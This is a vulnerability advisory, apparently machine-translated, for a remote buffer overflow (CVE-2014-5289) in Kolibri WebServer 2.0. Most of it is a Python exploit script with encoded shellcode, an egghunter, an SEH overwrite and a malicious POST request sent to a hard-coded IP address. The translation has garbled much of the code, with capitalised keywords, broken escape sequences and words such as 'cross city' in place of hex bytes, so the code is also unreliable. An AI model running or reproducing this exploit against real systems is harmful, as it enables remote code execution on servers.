Kolibri buffer overflow vulnerability in CVE-2014-5289)
Release date:
Updated on:
Affected Systems:
SENKAS Kolibri WebServer 2.0
SENKAS Kolibri WebServer
Description:
Bugtraq id: 69263
CVE (CAN) ID: CVE-2014-5289
Kolibri is a simple HTTP server that supports static Web content and the License book is GPL V3.
Kolibri 2.0 and other versions have the remote buffer overflow vulnerability when handling ultra-long POST requests. Attackers can exploit this vulnerability to execute arbitrary code in the context of the affected application.
<* Source: tekwizz123
*>
Test method:
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
----------------------------------
#! /Bin/python
Import socket
# [*] X86/alpha_mixed succeeded with size 636 (iteration = 1)
Buf = "\ x45 \ x44 \ x44 \ x43 \ x45 \ x44 \ x44 \ x43" # TAG
Buf + = "\ x89 \ xe5 \ xda \ xdd \ xd9 \ x75 \ xf4 \ x5f \ x57 \ x59 \ x49 \ x49 \ x49"
Buf + = "\ x49 \ x49 \ x49 \ x49 \ x49 \ x49 \ x49 \ x43 \ x43 \ x43 \ x43 \ x43 \ x43 \ x43"
Buf + = "\ x37 \ x51 \ x5a \ x6a \ x41 \ x58 \ x50 \ x30 \ x41 \ x30 \ x41 \ x6b \ x41"
Buf + = "\ x41 \ x51 \ x32 \ x41 \ x42 \ x32 \ x42 \ x42 \ x30 \ x42 \ x42 \ x41 \ x42"
Buf + = "\ x58 \ x50 \ x38 \ x41 \ x42 \ x75 \ x4a \ x49 \ x49 \ x6c \ x69 \ x78 \ x6e"
Buf + = "\ x66 \ x53 \ x30 \ x35 \ x50 \ x73 \ x30 \ x75 \ x30 \ x6d \ x59 \ x4a \ x45"
Buf + = "\ x35 \ x61 \ x4e \ x32 \ x33 \ x54 \ x6c \ x4b \ x31 \ x42 \ x66 \ x50 \ x6c"
Buf + = "\ x4b \ x62 \ x72 \ x34 \ x4c \ x6c \ x4b \ x73 \ x62 \ x52 \ x34 \ x6e \ x6b"
Buf + = "\ x72 \ x52 \ x61 \ x38 \ x46 \ x6f \ x6c \ x77 \ x51 \ x5a \ x66 \ x46 \ x45"
Buf + = "\ x61 \ x59 \ x6f \ x54 \ x71 \ x79 \ x50 \ x4c \ x6c \ x75 \ x6c \ x50 \ x61"
Buf + = "\ x51 \ x6c \ x65 \ x52 \ x34 \ x6c \ x47 \ x50 \ x6f \ x31 \ x4a \ x6f \ x64"
Buf + = "\ x4d \ x57 \ x71 \ x6b \ x77 \ x4a \ x42 \ x7a \ x50 \ x36 \ x32 \ x71 \ x47"
Buf + = "\ x6e \ x6b \ x56 \ x32 \ x36 \ x4c \ x4b \ x53 \ x72 \ x55 \ x6c \ x4c"
Buf + = "\ x4b \ x50 \ x4c \ x42 \ x30 \ x33 \ x48 \ x4b \ x53 \ x32 \ x6a \ x56 \ x61"
Buf + = "\ x4a \ x71 \ x50 \ x51 \ x4c \ x4b \ x43 \ x69 \ x67 \ x50 \ x47 \ x71 \ x79"
Buf + = "\ x43 \ x6c \ x4b \ x31 \ x59 \ x62 \ x38 \ x68 \ x63 \ x77 \ x4c \ x51 \ x59"
Buf + = "\ x6e \ x6b \ x75 \ x64 \ x6c \ x4b \ x36 \ x61 \ x6b \ x66 \ x44 \ x71 \ x49"
Buf + = "\ x6f \ x55 \ x61 \ x69 \ x50 \ x4e \ x4c \ x4b \ x71 \ x38 \ x4f \ x46 \ x6d"
Buf + = "\ x37 \ x71 \ x78 \ x47 \ x65 \ x68 \ x39 \ cross 7 \ x34 \ x35 \ x7a \ x54 \ x47"
Buf + = "\ x73 \ x73 \ x4d \ x79 \ x68 \ x37 \ x4b \ x33 \ x4d \ x64 \ x64 \ cross 7 \ x75"
Buf + = "\ x6a \ x42 \ x56 \ x38 \ x6c \ x4b \ x72 \ x78 \ x75 \ x74 \ x53 \ x31 \ x4e"
Buf + = "\ x33 \ x50 \ x66 \ x4c \ x4b \ x54 \ x4c \ x4b \ x4b \ x6c \ x4b \ x36 \ x38"
Buf + = "\ x65 \ x4c \ x33 \ x31 \ x4e \ x33 \ x4e \ x6b \ x67 \ x74 \ x4c \ x4b \ x76"
Buf + = "\ x61 \ x48 \ x50 \ x6f \ x79 \ x71 \ x54 \ x51 \ x34 \ x34 \ x64 \ x43 \ x6b"
Buf + = "\ x71 \ x4b \ x73 \ x51 \ x53 \ x69 \ x32 \ x7a \ x42 \ x71 \ x79 \ x6f \ x4d"
Buf + = "\ x30 \ x42 \ x78 \ x43 \ x6f \ x51 \ x4a \ x6c \ x4b \ x37 \ x62 \ x58 \ x6b"
Buf + = "\ x6d \ x59 \ x31 \ x4d \ x45 \ x38 \ x33 \ x74 \ x72 \ x63 \ x30 \ x67"
Buf + = "\ cross 7 \ x75 \ x38 \ cross 7 \ x77 \ x33 \ x43 \ x46 \ x52 \ x31 \ x4f \ x42 \ x74"
Buf + = "\ x68 \ x62 \ x6c \ x63 \ x47 \ x65 \ x76 \ x56 \ x67 \ x6b \ x4f \ x4b"
Buf + = "\ x65 \ x6c \ x78 \ x6e \ cross \ x76 \ x61 \ x45 \ x50 \ x37 \ cross 7 \ x45 \ x79"
Buf + = "\ x49 \ x54 \ x76 \ x34 \ cross \ x50 \ x65 \ x38 \ x76 \ x49 \ x4b \ x30 \ x52"
Buf + = "\ x4b \ x45 \ x50 \ x49 \ x6f \ x4b \ x65 \ x46 \ x30 \ x50 \ x50 \ cross city \ x50"
Buf + = "\ x76 \ x30 \ x37 \ x30 \ x42 \ x47 \ x30 \ x42 \ x71 \ x78 \ x48"
Buf + = "\ x6a \ x76 \ x6f \ x4b \ x6f \ x49 \ cross city \ x39 \ x6f \ x59 \ x45 \ x5a \ x37"
Buf + = "\ x50 \ x6a \ x63 \ x35 \ x71 \ x78 \ x4f \ x30 \ x6f \ x58 \ x65 \ x6e \ x4f"
Buf + = "\ x71 \ x75 \ x38 \ x65 \ x52 \ x43 \ x30 \ x36 \ x71 \ x53 \ x6c \ x6c \ x49"
Buf + = "\ x4d \ x36 \ x73 \ x5a \ x44 \ x50 \ x43 \ x66 \ x43 \ x67 \ x32 \ x48 \ x6a"
Buf + = "\ x39 \ x49 \ x35 \ x62 \ x54 \ x63 \ x51 \ x59 \ x6f \ x78 \ x55 \ x4f \ x75"
Buf + = "\ x59 \ x50 \ x42 \ x54 \ x36 \ x6c \ x6b \ x4f \ x32 \ x6e \ x65 \ x58 \ x72"
Buf + = "\ x55 \ x7a \ x4c \ x30 \ x68 \ x38 \ x58 \ x35 \ x6f \ x52 \ x33 \ x66"
Buf + = "\ x6b \ x4f \ x58 \ x55 \ cross \ x6a \ x35 \ x50 \ x72 \ x4a \ x76 \ x64 \ x63"
Buf + = "\ x66 \ x50 \ x57 \ x53 \ x58 \ x66 \ x62 \ x78 \ x59 \ x68 \ x48 \ x43 \ x6f"
Buf + = "\ x79 \ x6f \ x7a \ x75 \ x6c \ x4b \ x65 \ x66 \ x72 \ x4a \ x73 \ cross 7 \ x65"
Buf + = "\ x38 \ x65 \ x50 \ x34 \ x50 \ x67 \ cross 7 \ x37 \ cross 7 \ x73 \ x66 \ x32 \ x4a"
Buf + = "\ x43 \ x30 \ x55 \ x38 \ x43 \ x68 \ x4d \ x74 \ x31 \ x43 \ x4b \ x55 \ x39"
Buf + = "\ x6f \ x79 \ x45 \ x6e \ x73 \ x42 \ x73 \ x31 \ x7a \ x75 \ x50 \ x32 \ x76"
Buf + = "\ x76 \ x33 \ x43 \ x67 \ x51 \ x78 \ x56 \ x62 \ x49 \ x49 \ x39 \ x58 \ x61"
Buf + = "\ x4f \ x69 \ x6f \ x48 \ x55 \ x57 \ x71 \ x59 \ x53 \ x55 \ x79 \ x7a \ x66"
Buf + = "\ x4f \ x75 \ x79 \ x66 \ cross \ x75 \ x68 \ x6c \ x4a \ x63 \ x41 \ x41"
Egghunter = "\ x66 \ x81 \ xca \ xff \ x0f \ x42 \ x52 \ x6a \ x02 \ x58 \ xcd \ x2e \ x3c \ x05 \ x5a \ x74 \ xef \ xb
8 \ x45 \ x44 \ x44 \ x43 \ x8b \ xfa \ xaf \ x75 \ xea \ xaf \ x75 \ xe7 \ xff \ xe7"
Overflow = "A" * 12
Overflow + = "A" * (790-len (overflow)-len (egghunter ))
Overflow + = egghunter
Overflow + = "\ xEB \ xD9" # This offset seems to work against Windows 7 Professional, fully updated as of August 5th, 2014
Overflow + = "A" * 2
Overflow + = "\ x50 \ x45 \ x62" # SEH overwrite 00624550 aka pop ret from the binary itself.
# A lot of this is the same as exploit 34059 from exploit-db
Buffer = "POST/" + overflow + "HTTP/1.1 \ r \ n"
Buffer + = "User-Agent: Wget/1.13.4 \ r \ n"
Buffer + = "Host:" + buf + "\ r \ n"
Buffer + = "Accept: */* \ r \ n"
Buffer + = "Connection: Keep-Alive \ r \ n"
Buffer + = "Content-Type: application/x-www-form-urlencoded \ r \ n"
Buffer + = "Content-Length: 4"
Buffer + = "\ r \ n"
Buffer + = "licenseID = string & content = string & paramsXML = string"
Handle = socket. socket (socket. AF_INET, socket. SOCK_STREAM)
Handle. connect ("192.168.62.130", 8080 ))
Handle. send (buffer)
Handle. close ()
Suggestion:
Vendor patch:
SENKAS
------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
Http://www.senkas.com/kolibri/